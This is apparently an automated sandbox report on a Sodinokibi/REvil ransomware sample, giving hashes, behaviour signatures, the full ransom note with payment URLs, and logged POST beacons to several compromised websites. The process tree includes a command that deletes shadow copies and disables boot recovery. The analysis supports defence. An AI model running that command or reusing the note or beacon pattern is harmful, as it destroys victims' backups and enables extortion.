Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

10

d0190f94e6...18.exe

windows7-x64

10

d0190f94e6...18.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    140s
  • max time network
    144s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06/09/2024, 17:40 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe

  • Size

    179KB

  • MD5

    d0190f94e6d05104977c53b55dbc2911

  • SHA1

    c0ff002b0e26b180a741c3cefff15190df7746cc

  • SHA256

    f4e5d7a95681d920dda75fe5dd89be249905e2a7712f9b3b39e19351f5ef5e69

  • SHA512

    d4b1cc032f9d8254ac6035c27948147d8c4c5f60be51e632ba26c6e34ada87515b3113b4bd1cec3cedfa1a73c465a1267681ca05356d8f2f08d81c4fef04d868

  • SSDEEP

    3072:LNKQ4JTBg0Q8F63VETed7/kBazzFbULpC15RM:LNn4FQS63VE6F/M4qE15

Score
10/10
sodinokibidiscoveryransomware

Malware Config

Extracted

Path

C:\Users\7m7n045-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion 7m7n045. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/557D3C3EC7AB7055 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/557D3C3EC7AB7055 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: dA7pdvKB7426yxzvojf3NOgs/72fzWmvRPGm4fy0PDnuvo9Cx69uWtHdrojiJf7V Dj1tG0aDo+pjlaRrNiISnDLHHXHgvw7oWh3Adn0CIRSCk9YcP/Brru+h+0xmPy48 IzYWZz5WUKZZQSOLNCKyNM/2RXIkoluB8IjmThjwhuOpU3GlhkPe4IrenoWrqT9S kI7kJESWH3BqDWnxfpWvkyUpGUZlV/kD7MJHedoqNa2QpoqP8sCDRamto0L3KRN1 GHoWNFAPjfLKoF4f/oktlGAFUJS2DcS5BqQjc12sVSdOJqdj83cmZDRG/eaBFe6+ /eVlSfcK4dovSX9gAvFmqlJnuD/bJVJy2mmABrk6phStKRo6OhsVkB7WlVypMZqb Ii5RyNt2akW5Zv9hWVJ8fcm3/JD+XhXj560Q/Lz2+WTsXcl1XLi5AwGjz7mEz0++ dXGuDpkE2N8eOVCRA6n5ifRcQDQVMbaLa+2sMsWC6N4pMqFFcVB8ZNzTzCaupaSK l9KFXJrgHl4J9my2gR5Asv0YGkJhAG8rr26kUABl80aAj0sUh1SQlIFEQfrnMpP5 /N5BZPhxKtlabyw0oJQsx3uTvptW4yVz6or1OUh0ziKpne1lU7VXjI/IdRu2XEfz V+RFDQjQuew6tUGaQSap25QiVEUzsgt4LcZhPThpdMKeIrZlVSvbv7vOGKRgpITv WmpG4PDQZnLpQCpW7eZv4rX07dtmgfNeIxohGzcadUfjI3bFuDcZj+BKWtrKIC8b P0GZfWqjXcNf68IwMaEca/Fjnpjj2xncnqOxN7iHONsv70T7nmS3WKPwFAk3aDWr tFPKHYR8kn815f3L/0qRvaml+cVXKAn5ZsNKLXv8Y7dXaPAsT0agRogaT3AtkWgh Dsw69xVnOQjDUTiHKgnLHWvVyZWTPKXs0hgqIO+DtVJ77KSTvY7ynmIGhWekCZ83 4IeNV/fbSshUU3xG4J7nS9HD6/6yGehdXRcBXIQzx2a8MAYCSnBLPv//FSanwCMO K+O6Lw6huEUS7Zqp03wBUSySN+NCRFa8Nmq6tLET1zLmvmoeMCYPfPNuftV9VtAZ PQVMn7vaPdTXHJL0uG27UiTmx1Xu0Ffz+4GB91dYyuJN4BYdlcHJ+L2yuBB586RO +hYXcqGdQqzNNVULF1YUIVqNcdadv8sUz60eKDCMPSUvqt9SwGj4aViVl2V2XiQk SfTcNM5Vuv2tq8wA7Su/Vg== Extension name: 7m7n045 ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/557D3C3EC7AB7055

http://decryptor.top/557D3C3EC7AB7055

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

    ransomwaresodinokibi
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops desktop.ini file(s) 27 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Program Files directory 36 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe"
    1⤵
    • Checks computer location settings
    • Drops desktop.ini file(s)
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1480
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet & bcdedit /set {default} recoveryenabled No & bcdedit /set {default} bootstatuspolicy ignoreallfailures
      2⤵
      • System Location Discovery: System Language Discovery
      PID:3552
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:1508
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4396,i,7447299413640964517,4240724842020506306,262144 --variations-seed-version --mojo-platform-channel-handle=1288 /prefetch:8
      1⤵
        PID:4160

      Network

      • flag-us
        DNS
        8.8.8.8.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        8.8.8.8.in-addr.arpa
        IN PTR
        Response
        8.8.8.8.in-addr.arpa
        IN PTR
        dnsgoogle
      • flag-us
        DNS
        8.8.8.8.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        8.8.8.8.in-addr.arpa
        IN PTR
      • flag-us
        DNS
        8.8.8.8.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        8.8.8.8.in-addr.arpa
        IN PTR
      • flag-us
        DNS
        196.249.167.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        196.249.167.52.in-addr.arpa
        IN PTR
      • flag-us
        DNS
        196.249.167.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        196.249.167.52.in-addr.arpa
        IN PTR
      • flag-us
        DNS
        196.249.167.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        196.249.167.52.in-addr.arpa
        IN PTR
      • flag-us
        DNS
        196.249.167.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        196.249.167.52.in-addr.arpa
        IN PTR
      • flag-us
        DNS
        196.249.167.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        196.249.167.52.in-addr.arpa
        IN PTR
      • flag-us
        DNS
        8.8.8.8.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        8.8.8.8.in-addr.arpa
        IN PTR
        Response
        8.8.8.8.in-addr.arpa
        IN PTR
        dnsgoogle
      • flag-us
        DNS
        8.8.8.8.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        8.8.8.8.in-addr.arpa
        IN PTR
      • flag-us
        DNS
        8.8.8.8.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        8.8.8.8.in-addr.arpa
        IN PTR
      • flag-us
        DNS
        8.8.8.8.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        8.8.8.8.in-addr.arpa
        IN PTR
      • flag-us
        DNS
        149.220.183.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        149.220.183.52.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        speiserei-hannover.de
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        Remote address:
        8.8.8.8:53
        Request
        speiserei-hannover.de
        IN A
        Response
        speiserei-hannover.de
        IN A
        62.113.229.82
      • flag-de
        POST
        https://speiserei-hannover.de/news/pictures/xdts.gif
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        Remote address:
        62.113.229.82:443
        Request
        POST /news/pictures/xdts.gif HTTP/1.1
        Cache-Control: no-cache
        Connection: close
        Pragma: no-cache
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:36.0) Gecko/20100101 Firefox/36.0
        Content-Length: 928
        Host: speiserei-hannover.de
        Response
        HTTP/1.1 404 Not Found
        Date: Fri, 06 Sep 2024 17:41:06 GMT
        Server: Apache
        Content-Length: 196
        Connection: close
        Content-Type: text/html; charset=iso-8859-1
      • flag-us
        DNS
        82.229.113.62.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        82.229.113.62.in-addr.arpa
        IN PTR
        Response
        82.229.113.62.in-addr.arpa
        IN PTR
        srv-a-dec-175 maxclusternet
      • flag-us
        DNS
        82.229.113.62.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        82.229.113.62.in-addr.arpa
        IN PTR
      • flag-us
        DNS
        delegationhub.com
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        Remote address:
        8.8.8.8:53
        Request
        delegationhub.com
        IN A
        Response
      • flag-us
        DNS
        136.32.126.40.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        136.32.126.40.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        95.221.229.192.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        95.221.229.192.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        subyard.com
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        Remote address:
        8.8.8.8:53
        Request
        subyard.com
        IN A
        Response
        subyard.com
        IN A
        62.221.214.138
      • flag-nl
        POST
        https://subyard.com/wp-content/pics/kuobnopwoa.gif
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        Remote address:
        62.221.214.138:443
        Request
        POST /wp-content/pics/kuobnopwoa.gif HTTP/1.1
        Cache-Control: no-cache
        Connection: close
        Pragma: no-cache
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:36.0) Gecko/20100101 Firefox/36.0
        Content-Length: 928
        Host: subyard.com
        Response
        HTTP/1.1 405 Not Allowed
        Server: openresty
        Date: Fri, 06 Sep 2024 17:41:07 GMT
        Content-Type: text/html
        Content-Length: 154
        Connection: close
        Age: 0
        X-Varnish-Cache: MISS
      • flag-us
        DNS
        martha-frets-ceramics.nl
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        Remote address:
        8.8.8.8:53
        Request
        martha-frets-ceramics.nl
        IN A
        Response
        martha-frets-ceramics.nl
        IN A
        185.135.241.6
      • flag-nl
        POST
        https://martha-frets-ceramics.nl/content/image/eomhlxhguw.gif
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        Remote address:
        185.135.241.6:443
        Request
        POST /content/image/eomhlxhguw.gif HTTP/1.1
        Cache-Control: no-cache
        Connection: close
        Pragma: no-cache
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:36.0) Gecko/20100101 Firefox/36.0
        Content-Length: 928
        Host: martha-frets-ceramics.nl
        Response
        HTTP/1.1 404 Not Found
        Server: nginx
        Date: Fri, 06 Sep 2024 17:41:08 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Vary: Accept-Encoding
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        Link: <https://martha-frets-ceramics.nl/wp-json/>; rel="https://api.w.org/"
        Vary: User-Agent
      • flag-us
        DNS
        138.214.221.62.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        138.214.221.62.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        6.241.135.185.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        6.241.135.185.in-addr.arpa
        IN PTR
        Response
        6.241.135.185.in-addr.arpa
        IN PTR
        server6 hosting2gonl
      • flag-us
        DNS
        hostastay.com
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        Remote address:
        8.8.8.8:53
        Request
        hostastay.com
        IN A
        Response
        hostastay.com
        IN A
        101.99.77.144
      • flag-us
        DNS
        50.23.12.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        50.23.12.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        217.106.137.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        217.106.137.52.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        217.106.137.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        217.106.137.52.in-addr.arpa
        IN PTR
      • flag-us
        DNS
        217.106.137.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        217.106.137.52.in-addr.arpa
        IN PTR
      • flag-us
        DNS
        144.77.99.101.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        144.77.99.101.in-addr.arpa
        IN PTR
        Response
        144.77.99.101.in-addr.arpa
        IN PTR
        server1kamonla
      • flag-us
        DNS
        144.77.99.101.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        144.77.99.101.in-addr.arpa
        IN PTR
      • flag-us
        DNS
        206.23.85.13.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        206.23.85.13.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        206.23.85.13.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        206.23.85.13.in-addr.arpa
        IN PTR
      • flag-us
        DNS
        19.229.111.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        19.229.111.52.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        92.12.20.2.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        92.12.20.2.in-addr.arpa
        IN PTR
        Response
        92.12.20.2.in-addr.arpa
        IN PTR
        a2-20-12-92deploystaticakamaitechnologiescom
      • flag-us
        DNS
        81.144.22.2.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        81.144.22.2.in-addr.arpa
        IN PTR
        Response
        81.144.22.2.in-addr.arpa
        IN PTR
        a2-22-144-81deploystaticakamaitechnologiescom
      • flag-us
        DNS
        luvbec.com
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        Remote address:
        8.8.8.8:53
        Request
        luvbec.com
        IN A
        Response
        luvbec.com
        IN A
        76.223.67.189
        luvbec.com
        IN A
        13.248.213.45
      • flag-us
        POST
        https://luvbec.com/wp-content/pictures/tbcwfh.jpg
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        Remote address:
        76.223.67.189:443
        Request
        POST /wp-content/pictures/tbcwfh.jpg HTTP/1.1
        Cache-Control: no-cache
        Connection: close
        Pragma: no-cache
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:36.0) Gecko/20100101 Firefox/36.0
        Content-Length: 928
        Host: luvbec.com
        Response
        HTTP/1.1 405 Method Not Allowed
        Date: Fri, 06 Sep 2024 17:42:05 GMT
        Content-Length: 0
        Connection: close
      • flag-us
        DNS
        dayenne-styling.nl
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        Remote address:
        8.8.8.8:53
        Request
        dayenne-styling.nl
        IN A
        Response
        dayenne-styling.nl
        IN A
        85.10.159.84
      • flag-us
        DNS
        dayenne-styling.nl
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        Remote address:
        8.8.8.8:53
        Request
        dayenne-styling.nl
        IN A
      • flag-us
        DNS
        189.67.223.76.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        189.67.223.76.in-addr.arpa
        IN PTR
        Response
        189.67.223.76.in-addr.arpa
        IN PTR
        a67c48129651a0940awsglobalacceleratorcom
      • flag-nl
        POST
        https://dayenne-styling.nl/include/images/njwqni.png
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        Remote address:
        85.10.159.84:443
        Request
        POST /include/images/njwqni.png HTTP/1.1
        Cache-Control: no-cache
        Connection: close
        Pragma: no-cache
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:36.0) Gecko/20100101 Firefox/36.0
        Content-Length: 928
        Host: dayenne-styling.nl
        Response
        HTTP/1.1 500 Internal Server Error
        Server: nginx
        Date: Fri, 06 Sep 2024 17:42:07 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Set-Cookie: 46f8f8a5e7e6f47e87e7960b89f7991e=94ae026j5m1d5j70o47ccli6q1; path=/; secure; HttpOnly
        Cache-Control: public
      • flag-us
        DNS
        84.159.10.85.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        84.159.10.85.in-addr.arpa
        IN PTR
        Response
        84.159.10.85.in-addr.arpa
        IN PTR
        851015984nltransipme
      • flag-us
        DNS
        73.144.22.2.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        73.144.22.2.in-addr.arpa
        IN PTR
        Response
        73.144.22.2.in-addr.arpa
        IN PTR
        a2-22-144-73deploystaticakamaitechnologiescom
      • flag-us
        DNS
        111firstdelray.com
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        Remote address:
        8.8.8.8:53
        Request
        111firstdelray.com
        IN A
        Response
        111firstdelray.com
        IN A
        146.148.139.87
      • flag-us
        DNS
        111firstdelray.com
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        Remote address:
        8.8.8.8:53
        Request
        111firstdelray.com
        IN A
      • flag-us
        DNS
        18.173.189.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        18.173.189.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        18.173.189.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        18.173.189.20.in-addr.arpa
        IN PTR
      • flag-us
        DNS
        lidkopingsnytt.nu
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        Remote address:
        8.8.8.8:53
        Request
        lidkopingsnytt.nu
        IN A
        Response
        lidkopingsnytt.nu
        IN A
        185.189.49.45
      • flag-us
        DNS
        lidkopingsnytt.nu
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        Remote address:
        8.8.8.8:53
        Request
        lidkopingsnytt.nu
        IN A
      • flag-us
        DNS
        lidkopingsnytt.nu
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        Remote address:
        8.8.8.8:53
        Request
        lidkopingsnytt.nu
        IN A
      • flag-us
        DNS
        lidkopingsnytt.nu
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        Remote address:
        8.8.8.8:53
        Request
        lidkopingsnytt.nu
        IN A
      • flag-se
        POST
        https://lidkopingsnytt.nu/wp-content/pictures/idjpbykasrxz.gif
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        Remote address:
        185.189.49.45:443
        Request
        POST /wp-content/pictures/idjpbykasrxz.gif HTTP/1.1
        Cache-Control: no-cache
        Connection: close
        Pragma: no-cache
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:36.0) Gecko/20100101 Firefox/36.0
        Content-Length: 928
        Host: lidkopingsnytt.nu
      • flag-us
        DNS
        45.49.189.185.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        45.49.189.185.in-addr.arpa
        IN PTR
      • flag-us
        DNS
        45.49.189.185.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        45.49.189.185.in-addr.arpa
        IN PTR
      • flag-us
        DNS
        45.49.189.185.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        45.49.189.185.in-addr.arpa
        IN PTR
      • flag-us
        DNS
        45.49.189.185.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        45.49.189.185.in-addr.arpa
        IN PTR
      • flag-us
        DNS
        45.49.189.185.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        45.49.189.185.in-addr.arpa
        IN PTR
      • flag-us
        DNS
        18.173.189.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        18.173.189.20.in-addr.arpa
        IN PTR
        Response
      • 62.113.229.82:443
        https://speiserei-hannover.de/news/pictures/xdts.gif
        tls, http
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        8.4kB
         3.4kB
         17
        9

        HTTP Request

        POST https://speiserei-hannover.de/news/pictures/xdts.gif

        HTTP Response

        404
      • 62.221.214.138:443
        https://subyard.com/wp-content/pics/kuobnopwoa.gif
        tls, http
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        2.0kB
         5.1kB
         10
        11

        HTTP Request

        POST https://subyard.com/wp-content/pics/kuobnopwoa.gif

        HTTP Response

        405
      • 185.135.241.6:443
        https://martha-frets-ceramics.nl/content/image/eomhlxhguw.gif
        tls, http
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        3.2kB
         29.2kB
         26
        27

        HTTP Request

        POST https://martha-frets-ceramics.nl/content/image/eomhlxhguw.gif

        HTTP Response

        404
      • 101.99.77.144:443
        hostastay.com
        tls
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        1.1kB
         1.6kB
         12
        6
      • 101.99.77.144:443
        hostastay.com
        tls
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        512 B
         610 B
         8
        4
      • 101.99.77.144:443
        hostastay.com
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        346 B
         92 B
         7
        2
      • 76.223.67.189:443
        https://luvbec.com/wp-content/pictures/tbcwfh.jpg
        tls, http
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        2.2kB
         4.9kB
         13
        16

        HTTP Request

        POST https://luvbec.com/wp-content/pictures/tbcwfh.jpg

        HTTP Response

        405
      • 85.10.159.84:443
        https://dayenne-styling.nl/include/images/njwqni.png
        tls, http
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        1.9kB
         4.5kB
         9
        9

        HTTP Request

        POST https://dayenne-styling.nl/include/images/njwqni.png

        HTTP Response

        500
      • 146.148.139.87:443
        111firstdelray.com
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        260 B
         80 B
         5
        2
      • 185.189.49.45:443
        https://lidkopingsnytt.nu/wp-content/pictures/idjpbykasrxz.gif
        tls, http
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        1.8kB
         3.2kB
         7
        6

        HTTP Request

        POST https://lidkopingsnytt.nu/wp-content/pictures/idjpbykasrxz.gif
      • 8.8.8.8:53
        8.8.8.8.in-addr.arpa
        dns
        198 B
         90 B
         3
        1

        DNS Request

        8.8.8.8.in-addr.arpa

        DNS Request

        8.8.8.8.in-addr.arpa

        DNS Request

        8.8.8.8.in-addr.arpa

      • 8.8.8.8:53
        196.249.167.52.in-addr.arpa
        dns
        365 B
         5

        DNS Request

        196.249.167.52.in-addr.arpa

        DNS Request

        196.249.167.52.in-addr.arpa

        DNS Request

        196.249.167.52.in-addr.arpa

        DNS Request

        196.249.167.52.in-addr.arpa

        DNS Request

        196.249.167.52.in-addr.arpa

      • 8.8.8.8:53
        8.8.8.8.in-addr.arpa
        dns
        264 B
         90 B
         4
        1

        DNS Request

        8.8.8.8.in-addr.arpa

        DNS Request

        8.8.8.8.in-addr.arpa

        DNS Request

        8.8.8.8.in-addr.arpa

        DNS Request

        8.8.8.8.in-addr.arpa

      • 8.8.8.8:53
        149.220.183.52.in-addr.arpa
        dns
        73 B
         147 B
         1
        1

        DNS Request

        149.220.183.52.in-addr.arpa

      • 8.8.8.8:53
        speiserei-hannover.de
        dns
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        67 B
         83 B
         1
        1

        DNS Request

        speiserei-hannover.de

        DNS Response

        62.113.229.82

      • 8.8.8.8:53
        82.229.113.62.in-addr.arpa
        dns
        144 B
         115 B
         2
        1

        DNS Request

        82.229.113.62.in-addr.arpa

        DNS Request

        82.229.113.62.in-addr.arpa

      • 8.8.8.8:53
        delegationhub.com
        dns
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        63 B
         136 B
         1
        1

        DNS Request

        delegationhub.com

      • 8.8.8.8:53
        136.32.126.40.in-addr.arpa
        dns
        72 B
         158 B
         1
        1

        DNS Request

        136.32.126.40.in-addr.arpa

      • 8.8.8.8:53
        95.221.229.192.in-addr.arpa
        dns
        73 B
         144 B
         1
        1

        DNS Request

        95.221.229.192.in-addr.arpa

      • 8.8.8.8:53
        subyard.com
        dns
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        57 B
         73 B
         1
        1

        DNS Request

        subyard.com

        DNS Response

        62.221.214.138

      • 8.8.8.8:53
        martha-frets-ceramics.nl
        dns
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        70 B
         86 B
         1
        1

        DNS Request

        martha-frets-ceramics.nl

        DNS Response

        185.135.241.6

      • 8.8.8.8:53
        138.214.221.62.in-addr.arpa
        dns
        73 B
         133 B
         1
        1

        DNS Request

        138.214.221.62.in-addr.arpa

      • 8.8.8.8:53
        6.241.135.185.in-addr.arpa
        dns
        72 B
         107 B
         1
        1

        DNS Request

        6.241.135.185.in-addr.arpa

      • 8.8.8.8:53
        hostastay.com
        dns
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        59 B
         75 B
         1
        1

        DNS Request

        hostastay.com

        DNS Response

        101.99.77.144

      • 8.8.8.8:53
        50.23.12.20.in-addr.arpa
        dns
        70 B
         156 B
         1
        1

        DNS Request

        50.23.12.20.in-addr.arpa

      • 8.8.8.8:53
        217.106.137.52.in-addr.arpa
        dns
        219 B
         147 B
         3
        1

        DNS Request

        217.106.137.52.in-addr.arpa

        DNS Request

        217.106.137.52.in-addr.arpa

        DNS Request

        217.106.137.52.in-addr.arpa

      • 8.8.8.8:53
        144.77.99.101.in-addr.arpa
        dns
        144 B
         102 B
         2
        1

        DNS Request

        144.77.99.101.in-addr.arpa

        DNS Request

        144.77.99.101.in-addr.arpa

      • 8.8.8.8:53
        206.23.85.13.in-addr.arpa
        dns
        142 B
         145 B
         2
        1

        DNS Request

        206.23.85.13.in-addr.arpa

        DNS Request

        206.23.85.13.in-addr.arpa

      • 8.8.8.8:53
        19.229.111.52.in-addr.arpa
        dns
        72 B
         158 B
         1
        1

        DNS Request

        19.229.111.52.in-addr.arpa

      • 8.8.8.8:53
        92.12.20.2.in-addr.arpa
        dns
        69 B
         131 B
         1
        1

        DNS Request

        92.12.20.2.in-addr.arpa

      • 8.8.8.8:53
        81.144.22.2.in-addr.arpa
        dns
        70 B
         133 B
         1
        1

        DNS Request

        81.144.22.2.in-addr.arpa

      • 8.8.8.8:53
        luvbec.com
        dns
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        56 B
         88 B
         1
        1

        DNS Request

        luvbec.com

        DNS Response

        76.223.67.189
        13.248.213.45

      • 8.8.8.8:53
        dayenne-styling.nl
        dns
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        128 B
         80 B
         2
        1

        DNS Request

        dayenne-styling.nl

        DNS Request

        dayenne-styling.nl

        DNS Response

        85.10.159.84

      • 8.8.8.8:53
        189.67.223.76.in-addr.arpa
        dns
        72 B
         128 B
         1
        1

        DNS Request

        189.67.223.76.in-addr.arpa

      • 8.8.8.8:53
        84.159.10.85.in-addr.arpa
        dns
        71 B
         111 B
         1
        1

        DNS Request

        84.159.10.85.in-addr.arpa

      • 8.8.8.8:53
        73.144.22.2.in-addr.arpa
        dns
        70 B
         133 B
         1
        1

        DNS Request

        73.144.22.2.in-addr.arpa

      • 8.8.8.8:53
        111firstdelray.com
        dns
